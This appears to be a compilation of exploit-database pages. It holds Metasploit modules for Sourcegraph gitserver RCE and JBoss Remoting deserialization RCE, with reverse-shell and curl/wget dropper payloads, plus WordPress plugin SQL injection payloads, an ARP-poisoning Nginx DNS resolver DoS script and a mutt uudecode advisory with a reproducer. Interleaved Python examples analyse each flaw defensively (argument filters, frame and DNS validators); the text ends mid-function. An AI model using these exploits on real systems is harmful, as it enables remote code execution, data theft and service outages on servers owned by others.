<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Sourcegraph gitserver sshCommand RCE',<br /> 'Description' => %q{<br /> A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute<br /> arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can<br /> then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a<br /> feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the<br /> commands that are able to be executed through the git exec REST API.<br /> },<br /> 'Author' => [<br /> 'Altelus1', # github PoC<br /> 'Spencer McIntyre' # metasploit module<br /> ],<br /> 'References' => [<br /> ['CVE', '2022-23642'],<br /> ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],<br /> ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],<br /> ],<br /> 'DisclosureDate' => '2022-02-18', # Public disclosure<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_memory<br /> },<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> # when the OS command is executed, it's executed twice which will cause some of the command stagers to<br /> # be corrupt, these two work even for larger 
payloads because they're downloaded in a single command<br /> 'CmdStagerFlavor' => %w[curl wget],<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> },<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 3178<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/']),<br /> OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])<br /> ])<br /> end<br /><br /> def check<br /> res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])<br /> return CheckCode::Unknown unless res<br /><br /> if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/<br /> # this is the response if the target repo does exist, highly unlikely since it's randomized<br /> return CheckCode::Vulnerable('Successfully set core.sshCommand.')<br /> elsif res.code == 404 && res.body =~ /"cloneInProgress"/<br /> # this is the response if the target repo does not exist<br /> return CheckCode::Vulnerable<br /> elsif res.code == 400 && res.body =~ /^invalid command/<br /> # this is the response when the server is patched, regardless of if there are cloned repos<br /> return CheckCode::Safe<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> if datastore['EXISTING_REPO'].blank?<br /> @git_repo = send_request_list.sample<br /> fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo<br /><br /> print_status("Using automatically identified repository: #{@git_repo}")<br /> else<br /> @git_repo = datastore['EXISTING_REPO']<br /> end<br /><br /> print_status("Executing #{target.name} target")<br /><br /> @git_origin = Rex::Text.rand_text_alphanumeric(4..11)<br /> git_remote = 
"git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"<br /> vprint_status("Using #{@git_origin} as a fake git origin")<br /> send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])<br /><br /> case target['Type']<br /> when :unix_memory<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def cleanup<br /> return unless @git_repo && @git_origin<br /><br /> vprint_status('Cleaning up the git changes...')<br /> # delete the remote that was created<br /> send_request_exec(@git_repo, ['remote', 'remove', @git_origin])<br /> # unset the core.sshCommand value<br /> send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])<br /> ensure<br /> super<br /> end<br /><br /> def send_request_exec(repo, args, timeout = 20)<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'exec'),<br /> 'method' => 'POST',<br /> 'data' => {<br /> 'Repo' => repo,<br /> 'Args' => args<br /> }.to_json<br /> }, timeout)<br /> end<br /><br /> def send_request_list<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'list'),<br /> 'method' => 'GET',<br /> 'vars_get' => { 'cloned' => 'true' }<br /> })<br /> fail_with(Failure::Unreachable, 'No server response.') unless res<br /> fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)<br /><br /> res.get_json_document<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])<br /> fail_with(Failure::Unreachable, 'No server response.') unless res<br /> unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/<br /> if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false<br /> fail_with(Failure::BadConfig, 'The 
specified repository has not been cloned.')<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')<br /> end<br /><br /> send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)<br /> end<br /><br />end<br /></code></pre>
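The module above works because gitserver's /exec endpoint passed whatever `Args` it was given straight to git; the fix described in the module's notes filters which subcommands that endpoint will run. The following is an added example of such a filter, not Sourcegraph's code: an allowlist of read-only subcommands, plus a refusal of leading global options. It goes beyond the page in that last point, because `git -c core.sshCommand=... <subcommand>` sets the same option inline without ever invoking `config`, so a filter that looks only at the subcommand name is not enough. The allowlist, the list of dangerous config keys and the sample remote name and command are assumptions.

```python
# Added example (not Sourcegraph's code): an allowlist filter for git
# arguments accepted over an exec-style API. The lists are assumptions.
from typing import Sequence, Tuple

# Read-only subcommands reasonable to expose. Anything that writes to the
# repository, talks to a remote, or spawns helpers is deliberately absent.
ALLOWED_SUBCOMMANDS = frozenset({
    "rev-parse", "rev-list", "log", "show", "diff", "ls-files", "ls-tree",
    "cat-file", "blame", "for-each-ref", "symbolic-ref",
})

# Config keys whose value git later runs as a command (non-exhaustive).
DANGEROUS_CONFIG_KEYS = (
    "core.sshcommand", "core.gitproxy", "core.pager", "core.editor",
    "diff.external", "uploadpack.packobjectshook", "credential.helper",
    "protocol.ext.allow",
)

# Options of otherwise read-only subcommands that write files or run helpers
# (`git log --output=<file>` writes to disk, `--ext-diff` runs a program).
DANGEROUS_OPTION_PREFIXES = ("--output", "--ext-diff", "--upload-pack", "--receive-pack")


def check_git_args(args: Sequence[str]) -> Tuple[bool, str]:
    """Decide whether `git <args>` may run on behalf of an API caller.
    Returns (allowed, reason)."""
    if not args:
        return False, "empty argument list"
    # Global options precede the subcommand; `git -c key=value ...` and
    # `git --config-env=...` inject config without ever calling `config`,
    # so refuse every leading option instead of enumerating harmless ones.
    if args[0].startswith("-"):
        return False, f"global option {args[0]!r} before the subcommand is not allowed"
    if args[0] not in ALLOWED_SUBCOMMANDS:
        return False, f"subcommand {args[0]!r} is not allowlisted"
    for arg in args[1:]:
        lowered = arg.lower()
        if lowered.startswith(DANGEROUS_OPTION_PREFIXES):
            return False, f"option {arg!r} writes files or runs a helper"
        if any(lowered.startswith(key) for key in DANGEROUS_CONFIG_KEYS):
            return False, f"argument {arg!r} names a config key that executes commands"
    return True, "ok"


# The three exec calls the module above makes, in order (remote name and
# the command string are illustrative values, not from the page).
EXPLOIT_SEQUENCE = [
    ["remote", "add", "abcd", "git@efgh:ijkl.git"],
    ["config", "core.sshCommand", "id > /tmp/pwned"],
    ["push", "abcd", "master"],
]


def blocked_steps(sequence=EXPLOIT_SEQUENCE):
    """Which steps of the exploit sequence the filter stops, with reasons."""
    return [(step[0], check_git_args(step)[1])
            for step in sequence if not check_git_args(step)[0]]


if __name__ == "__main__":
    for sub, why in blocked_steps():
        print(f"blocked {sub}: {why}")
    print(check_git_args(["rev-parse", "HEAD"]))
```

All three of the module's exec calls are refused at the subcommand check; the remaining rules exist so that a later, broader allowlist does not quietly reopen the same hole through `-c`, `--config-env` or a file-writing option.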
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::JavaDeserialization<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'JBOSS EAP/AS Remoting Unified Invoker RCE',<br /> 'Description' => %q{<br /> An unauthenticated attacker with network access to the JBOSS<br /> EAP/AS <= 6.x Remoting Unified Invoker interface can send a<br /> serialized object to the interface to execute code on vulnerable hosts.<br /> },<br /> 'Author' => [<br /> 'Joao Matos <@joaomatosf>', # Discovery<br /> 'Marcio Almeida <@marcioalm>', # PoC<br /> 'Heyder Andrade <@HeyderAndrade>' # msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf']<br /> ],<br /> 'DisclosureDate' => '2019-12-11',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => [ 'printf' ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, 
ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> Opt::RPORT(4446)<br /> ])<br /> end<br /><br /> def handshake_data<br /> # MAGIC BYTES JAVA SERIALIZATION OBJECT HEADER<br /> # AC ED: STREAM_MAGIC. Specifies that this is a serialization protocol.<br /> # 00 05: STREAM_VERSION. The serialization version.<br /> ['aced0005'].pack('H*')<br /> end<br /><br /> def check<br /> connect<br /> sock.put(handshake_data)<br /> data = sock.get_once(16)<br /> disconnect<br /> return Exploit::CheckCode::Appears if data == handshake_data<br /><br /> return Exploit::CheckCode::Safe<br /> rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e<br /> print_error("Error to connect #{rhost}:#{rport} : '#{e.class}' '#{e}'")<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> # def exploit<br /> def execute_command(cmd, _opts = {})<br /> java_payload = generate_java_deserialization_for_command('CommonsCollections5', 'bash', cmd)<br /> # MAGIC BYTES JBOSS PROTOCOL:<br /> # 0x77: TC_BLOCKDATA<br /> # 0x01: Length of TC_BLOCKDATA<br /> # 0x16: Protocol version 22<br /> # 0x79: TC_RESET<br /> magic_bytes = ['77011679'].pack('H*')<br /> payload = magic_bytes + java_payload.byteslice(4..)<br /> connect<br /> sock.put(handshake_data)<br /> sock.get_once(16)<br /> sock.put(payload)<br /> disconnect<br /> print_good('Successfully sent payload')<br /> rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError => e<br /> fail_with(Failure::Unreachable, e.message)<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br />end<br /></code></pre>
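The module's check() and execute_command() together describe the wire format of the Remoting Unified Invoker: the client sends the 4-byte Java serialization stream header (AC ED 00 05), the server echoes it back, and every object sent afterwards travels without its own stream header, behind the JBoss block 77 01 16 79 (TC_BLOCKDATA, length 1, protocol version 22, TC_RESET). The following added example, which is not the module's code, implements that framing and a parser for it in Python. The serialized object is a constructed stand-in (a stream header followed by TC_OBJECT and a short class name), not a gadget chain; the parser is the kind of check a network detection would run on traffic to the invoker port.

```python
# Added example (not the module's code): the Unified Invoker framing the
# module's check() and execute_command() rely on, and a parser for it.
STREAM_MAGIC = b"\xac\xed"                   # Java serialization STREAM_MAGIC
STREAM_VERSION = b"\x00\x05"                 # STREAM_VERSION 5
JAVA_STREAM_HEADER = STREAM_MAGIC + STREAM_VERSION   # the module's handshake_data
TC_BLOCKDATA, TC_RESET, TC_OBJECT = 0x77, 0x79, 0x73
JBOSS_REMOTING_VERSION = 0x16                # 22, from the module's magic_bytes
INVOKER_BLOCK = bytes([TC_BLOCKDATA, 0x01, JBOSS_REMOTING_VERSION, TC_RESET])


def is_unified_invoker_banner(reply: bytes) -> bool:
    """check(): the invoker answers a stream header by echoing one back."""
    return reply[:4] == JAVA_STREAM_HEADER


def frame_for_invoker(serialized: bytes) -> bytes:
    """Re-frame a standalone serialized object (ysoserial-style output) as the
    module does: drop its own stream header, already exchanged in the
    handshake, and lead with the JBoss block 77 01 16 79."""
    if serialized[:4] != JAVA_STREAM_HEADER:
        raise ValueError("not a Java serialization stream (missing AC ED 00 05)")
    return INVOKER_BLOCK + serialized[4:]


def parse_invoker_frame(frame: bytes) -> dict:
    """Walk a frame the way a wire-level detector on the invoker port would."""
    if len(frame) < 4 or frame[0] != TC_BLOCKDATA:
        raise ValueError("frame does not start with TC_BLOCKDATA (0x77)")
    block_len = frame[1]
    block = frame[2:2 + block_len]
    off = 2 + block_len
    if off >= len(frame) or frame[off] != TC_RESET:
        raise ValueError("expected TC_RESET (0x79) after the block data")
    off += 1
    next_tag = frame[off] if off < len(frame) else None
    return {
        "protocol_version": block[0] if block_len == 1 else None,
        "next_tag": next_tag,
        "carries_object": next_tag == TC_OBJECT,   # TC_OBJECT: deserialization follows
        "object_bytes": len(frame) - off,
    }


# Constructed stand-in for a serialized object: a stream header followed by
# TC_OBJECT, TC_CLASSDESC and a short class name. Not a gadget chain.
SAMPLE_OBJECT = JAVA_STREAM_HEADER + b"\x73\x72\x00\x05Dummy"


def client_exchange(server_reply: bytes, serialized: bytes = SAMPLE_OBJECT):
    """Both halves of the module's flow: returns the framed payload to send
    if the banner identifies an invoker, otherwise None."""
    if not is_unified_invoker_banner(server_reply):
        return None
    return frame_for_invoker(serialized)


if __name__ == "__main__":
    framed = client_exchange(JAVA_STREAM_HEADER)
    print(framed.hex(), parse_invoker_frame(framed))
```

For detection, the sequence to look for on TCP/4446 after the echoed stream header is `77 01 16 79 73`: a block data record followed immediately by TC_OBJECT means the server is about to deserialize attacker-supplied bytes.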
<pre><code>## Title: WordPress 6.0 - Visual Slide Box Builder 3.2.9 SQLi<br />## Author: nu11secur1ty<br />## Date: 07.11.2022<br />## Vendor: https://wphive.com/<br />## Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin<br /><br /><br /><br />## Description:<br />The `idx` parameter of the Visual Slide Box Builder plugin for WordPress<br />(reached through the `vsbb_get_one` action) is vulnerable to SQL injection,<br />as the sqlmap output below shows. An attacker can extract the contents of<br />the WordPress database through it.<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: idx (GET)<br /> Type: boolean-based blind<br /> Title: HAVING boolean-based blind - WHERE, GROUP BY clause<br /> Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)<br />HAVING 1854=1854<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)<br />AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 6 columns<br /> Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT<br />NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/jlp5sx)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)<br /># Date: 2022-6-29<br /># Exploit Author: Mohammed Alshehri - https://Github.com/M507<br /># Vendor Homepage: https://nginx.org/<br /># Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0<br /># Version: 0.6.18 - 1.20.0<br /># Tested on: Ubuntu 18.04.4 LTS bionic <br /># CVE: CVE-2021-23017<br /># The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn<br /># python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1<br /># The service needs to be configured to use Nginx resolver<br /><br />from scapy.all import *<br />from multiprocessing import Process<br />from binascii import hexlify, unhexlify<br />import argparse, time, os<br /><br />def device_setup():<br /> os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")<br /> os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")<br /><br />def ARPP(target, dns_server):<br /> print("[*] Sending poisoned ARP packets")<br /> target_mac = getmacbyip(target)<br /> dns_server_mac = getmacbyip(dns_server)<br /> while True:<br /> time.sleep(2)<br /> send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)<br /> send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)<br /><br />def exploit(target):<br /> print("[*] Listening ")<br /> sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)<br /><br />"""<br />RFC schema<br /> 0 1 2 3<br /> 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| LENGTH | ID |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />|Q| OPCODE|A|T|R|R|Z|A|C| RCODE | QDCOUNT |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| ANCOUNT | NSCOUNT |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| ARCOUNT | QD |<br 
/>+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| AN | NS |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br />| AR |<br />+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<br /><br />Fig. DNS <br /><br />"""<br />def process_received_packet(received_packet):<br /> if received_packet[IP].src == target_ip:<br /> if received_packet.haslayer(DNS):<br /> if DNSQR in received_packet:<br /> print("[*] the received packet: " + str(bytes_hex(received_packet)))<br /> print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))<br /> try:<br /> # \/ the received DNS request<br /> dns_request = received_packet[DNS].build()<br /> null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)<br /> print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))<br /> print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))<br /> payload = [<br /> dns_request[0:2],<br /> b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",<br /> dns_request[12:null_pointer_index+1],<br /> dns_request[null_pointer_index+1:null_pointer_index+3],<br /> dns_request[null_pointer_index+3:null_pointer_index+5],<br /> b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",<br /> b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",<br /> b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",<br /> b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"<br /> ]<br /> <br /> payload = b"".join(payload)<br /> spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\<br /> UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\<br /> payload)<br /> print("[+] dns answer: "+str(hexlify(payload)))<br /> print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))<br /><br /> sendp(spoofed_pkt, count=1)<br /> print("\n[+] malicious answer was sent")<br /> print("[+] exploited\n")<br /> except:<br /> print("\n[-] ERROR")<br /><br />def main():<br /> global target_ip<br /> 
parser = argparse.ArgumentParser()<br /> parser.add_argument("-t", "--target", help="IP address of the target")<br /> parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")<br /> args = parser.parse_args()<br /> target_ip = args.target<br /> dns_server_ip = args.dns_server<br /> device_setup()<br /> processes_list = []<br /> ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))<br /> exploitProcess = Process(target=exploit,args=(target_ip,))<br /> processes_list.append(ARPPProcess)<br /> processes_list.append(exploitProcess)<br /> for process in processes_list:<br /> process.start()<br /> for process in processes_list:<br /> process.join()<br /><br />if __name__ == '__main__':<br /> target_ip = ""<br /> main()<br /> <br /><br /></code></pre>
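The PoC above forges a CNAME answer whose RDLENGTH field (`\x00\x0B`, 11 bytes) does not match the 27 bytes of RDATA that actually follow, and whose closing compression pointer (`\xC0\x04`) points into the DNS header rather than at an earlier name. The following added example, which is not part of the PoC, rebuilds that answer from a constructed query with exactly the splicing the PoC uses and runs it through a small wire-format checker of the kind a resolver has to apply before trusting any length it reads off the network. It does not claim which of these checks nginx's resolver tripped on, only which invariants the forged packet breaks; a consistent CNAME answer is checked alongside for contrast. The query name and transaction ID are constructed values.

```python
# Added example (not from the PoC): DNS wire-format invariants a resolver must
# enforce, run over the PoC's forged answer and a consistent one.
import struct

HEADER_LEN = 12
MAX_LABEL_LEN = 63
MAX_NAME_LEN = 255
NAME_RTYPES = {2: "NS", 5: "CNAME", 12: "PTR"}   # RDATA is a single domain name


def read_name(msg: bytes, off: int, depth: int = 0):
    """Parse a wire-format name at `off`.
    Returns (name, offset just past the in-line encoding, list of problems)."""
    labels, problems, consumed = [], [], 0
    while True:
        if off >= len(msg):
            problems.append("name runs past end of message")
            return ".".join(labels), off, problems
        length = msg[off]
        if length & 0xC0 == 0xC0:                        # compression pointer
            if off + 1 >= len(msg):
                problems.append("truncated compression pointer")
                return ".".join(labels), len(msg), problems
            target = ((length & 0x3F) << 8) | msg[off + 1]
            # A pointer must refer to a name that appeared earlier; the
            # 12-byte header can never hold one.
            if target < HEADER_LEN or target >= off:
                problems.append(f"compression pointer to offset {target} "
                                f"(must be in [{HEADER_LEN}, {off}))")
            elif depth >= 8:
                problems.append("compression pointer chain too deep")
            else:
                tail, _, more = read_name(msg, target, depth + 1)
                problems += more
                if tail:
                    labels.append(tail)
            return ".".join(labels), off + 2, problems
        if length == 0:                                   # root label ends the name
            return ".".join(labels), off + 1, problems
        if length > MAX_LABEL_LEN:
            problems.append(f"label length {length} exceeds {MAX_LABEL_LEN}")
        if off + 1 + length > len(msg):
            problems.append("label runs past end of message")
            return ".".join(labels), len(msg), problems
        consumed += 1 + length
        if consumed > MAX_NAME_LEN:
            problems.append(f"name longer than {MAX_NAME_LEN} bytes")
        labels.append(msg[off + 1:off + 1 + length].decode("ascii", "replace"))
        off += 1 + length


def audit_dns_response(msg: bytes) -> list:
    """Check the length fields of a response against the bytes actually present."""
    problems = []
    if len(msg) < HEADER_LEN:
        return ["message shorter than the 12-byte header"]
    _id, _flags, qd, an, ns, ar = struct.unpack("!6H", msg[:HEADER_LEN])
    off = HEADER_LEN
    for _ in range(qd):
        _, off, more = read_name(msg, off)
        problems += more
        off += 4                                          # QTYPE + QCLASS
    for _ in range(an + ns + ar):
        _, off, more = read_name(msg, off)
        problems += more
        if off + 10 > len(msg):
            problems.append("resource record header truncated")
            return problems
        rtype, _rclass, _ttl, rdlength = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata_end = off + rdlength
        if rdata_end > len(msg):
            problems.append(f"RDLENGTH {rdlength} runs past end of message")
            return problems
        if rtype in NAME_RTYPES:
            _, name_end, more = read_name(msg, off)
            problems += more
            if name_end - off != rdlength:
                problems.append(f"{NAME_RTYPES[rtype]} RDLENGTH {rdlength} disagrees "
                                f"with the encoded name's {name_end - off} bytes")
        off = rdata_end
    if off != len(msg):
        problems.append(f"{len(msg) - off} trailing bytes after the last record")
    return problems


def build_query(qname: str, ident: int = 0x1337) -> bytes:
    """Constructed sample query (standard A lookup), not a captured packet."""
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    return struct.pack("!6H", ident, 0x0100, 1, 0, 0, 0) + name + b"\x00\x01\x00\x01"


def forge_answer_like_poc(dns_request: bytes) -> bytes:
    """The CNAME answer exactly as the PoC above splices it from the query."""
    null_idx = dns_request.find(0x00, 12)
    return b"".join([
        dns_request[0:2],
        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
        dns_request[12:null_idx + 1],
        dns_request[null_idx + 1:null_idx + 5],
        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
        b"\x00\x0B",                          # RDLENGTH claims 11 bytes ...
        b"\x18" + b"A" * 24 + b"\xC0\x04",    # ... 27 follow, ending in a pointer into the header
    ])


def well_formed_cname_answer(dns_request: bytes) -> bytes:
    """Constructed contrast: same shape, consistent lengths, pointer to the question name."""
    null_idx = dns_request.find(0x00, 12)
    rdata = b"\x03www" + b"\xC0\x0C"
    return b"".join([
        dns_request[0:2],
        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",
        dns_request[12:null_idx + 5],
        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",
        struct.pack("!H", len(rdata)), rdata,
    ])


if __name__ == "__main__":
    query = build_query("example.com")
    for problem in audit_dns_response(forge_answer_like_poc(query)):
        print("forged answer:", problem)
    print("well-formed answer:", audit_dns_response(well_formed_cname_answer(query)))
```

The two checks that matter here are the pointer range and the RDLENGTH comparison: a resolver that computes a name's length by following the encoding while sizing its buffer from RDLENGTH (or the other way round) is working from two numbers that an attacker can make disagree.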
<pre><code>mutt: mutt_decode_uuencoded() can read past the end of the input line<br /><br />In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replies, for example fragments of other messages, passphrases or keys.<br /><br />Reproduce with the following mbox; note that the <9f> markers stand for literal 0x9f bytes. This should show some uninitialized garbage in the message.<br /><br />From taviso Thu Mar 31 16:53:55 2022<br />From: taviso<br />Subject: mutt_decode_uuencoded test<br />Content-Disposition: inline<br />Content-Transfer-Encoding: x-uuencode<br />Content-Type: text/plain<br /><br />begin 644 test<br /><9f><br />M2&5L;&\L"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU<br />M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*"@H*<br /><9f><br />54&QE87-E(')E<&QY+`I4879I<RX*<br />`<br />end.<br /><br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is YYYY-MM-DD.<br /><br /><br />Related CVE Numbers: CVE-2022-1328.<br /><br /><br /><br />Found by: taviso@google.com<br /><br /></code></pre>
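The report above hinges on the length byte of a uuencoded line being trusted without checking that the line actually carries that many characters: a 0x9f byte decodes to a claimed 63 bytes, which needs 84 characters, on a line that has none. The following is an added example, not mutt's code: a uudecoder in which that check is explicit, run over the body of the mbox above with each `<9f>` marker replaced by a real 0x9f byte. In strict mode the two bad lines are reported and skipped instead of being read past; in lenient mode the missing characters are zero-filled, which is what CPython's `binascii.a2b_uu` does.

```python
# Added example (not mutt's code): a uudecoder that validates the length
# byte against the characters actually present on the line.

def uu_line_length(line: bytes) -> int:
    """Byte count a uuencoded line claims: first char minus ' ', low six bits."""
    return (line[0] - 0x20) & 0x3F


def decode_uu_line(line: bytes, strict: bool = True) -> bytes:
    """Decode one body line.
    strict=True rejects a line that promises more bytes than its characters can
    encode (the check the report says mutt lacks); strict=False zero-fills the
    missing characters, which is what CPython's binascii.a2b_uu does."""
    if not line:
        raise ValueError("empty line")
    n = uu_line_length(line)
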